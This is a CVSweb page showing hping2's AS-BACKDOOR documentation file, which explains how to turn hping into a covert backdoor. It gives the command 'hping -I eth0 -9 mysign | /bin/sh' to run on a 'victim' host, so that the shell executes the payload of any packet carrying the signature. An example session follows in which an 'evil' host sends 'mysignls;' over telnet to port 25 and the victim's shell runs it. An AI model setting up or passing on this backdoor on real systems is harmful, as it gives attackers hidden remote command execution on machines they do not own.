Annotation of embedaddon/hping2/docs/AS-BACKDOOR, revision 1.1
1.1 ! misho 1: hping can be used as a backdoor. Just try the -9 (--listen) option
! 2: and put in pipe with /bin/sh:
! 3:
! 4: Put hping in listen mode in the victim host.
! 5:
! 6: victim# hping -I eth0 -9 mysign | /bin/sh
! 7:
! 8: Every packet that contain "mysign" will be processed by hping,
! 9: all the bytes that follows "mysign" in the packet will be dumped
! 10: to the standard output, so for example I'll able to exec commands
! 11: using all types of protocols. Just for example I can use the smtpd
! 12: to exec 'ls' in the victim.
! 13:
! 14: evil$ telnet victim 25
! 15:
! 16: Trying 192.168.1.1...
! 17: Connected to nano (192.168.1.1).
! 18: Escape character is '^]'.
! 19: 220 nano.marmoc.net ESMTP Sendmail
! 20: mysignls;
! 21:
! 22: on the victim you will see:
! 23:
! 24: victim# hping -I eth0 -9 mysign | /bin/sh
! 25: hping2 listen mode
! 26: bin cdrom etc home local-home mnt root tmp var
! 27: boot dev export lib lost+found proc sbin usr
! 28: : command not found
! 29:
! 30: As you can see I used 'ls;' since otherwise the shell will receive
! 31: just ls^M. The ";" force the command execution (at least with bash and zsh,
! 32: check your shell for more information).
! 33:
! 34: This works with all kind of valid not-filtered IP packets, the higher
! 35: level protocl does not matter.
! 36:
! 37: antirez <antirez@invece.org>
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>
![[BACK]](/icons/cvsweb/back.gif){kind=icon}
Return to AS-BACKDOOR CVS log ![[TXT]](/icons/cvsweb/text.gif){kind=icon}
![[DIR]](/icons/cvsweb/dir.gif){kind=icon}
Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs